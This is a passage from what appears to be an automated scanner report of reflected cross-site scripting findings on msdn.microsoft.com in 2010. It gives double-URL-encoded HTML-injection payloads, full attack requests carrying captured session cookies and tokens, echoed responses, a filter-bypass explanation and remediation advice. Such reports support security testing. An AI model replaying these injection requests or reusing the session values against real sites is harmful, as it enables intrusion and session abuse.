17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:45 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf16d6"><a>df793d40793/library/bb871518" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8490f%2522%253e%253ca%253e2ba8dfb9f97 was submitted in the REST URL parameter 2. This input was echoed as 8490f"><a>2ba8dfb9f97 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library8490f%2522%253e%253ca%253e2ba8dfb9f97/bb871518.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:53 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library8490f"><a>2ba8dfb9f97/bb871518" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69909%2522%253e%253ca%253e23caee0588 was submitted in the REST URL parameter 3. This input was echoed as 69909"><a>23caee0588 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb871518.aspx69909%2522%253e%253ca%253e23caee0588 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9208 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:03 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871518.aspx69909"><a>23caee0588" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b435%2522%253e%253ca%253e05423347fd7 was submitted in the REST URL parameter 1. This input was echoed as 8b435"><a>05423347fd7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us8b435%2522%253e%253ca%253e05423347fd7/library/bb871519.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:43 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8b435"><a>05423347fd7/library/bb871519" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98e4%2522%253e%253ca%253eb5a34807f69 was submitted in the REST URL parameter 2. This input was echoed as f98e4"><a>b5a34807f69 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryf98e4%2522%253e%253ca%253eb5a34807f69/bb871519.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf98e4"><a>b5a34807f69/bb871519" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54530%2522%253e%253ca%253e0117325841e was submitted in the REST URL parameter 3. This input was echoed as 54530"><a>0117325841e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb871519.aspx54530%2522%253e%253ca%253e0117325841e HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:02 GMT
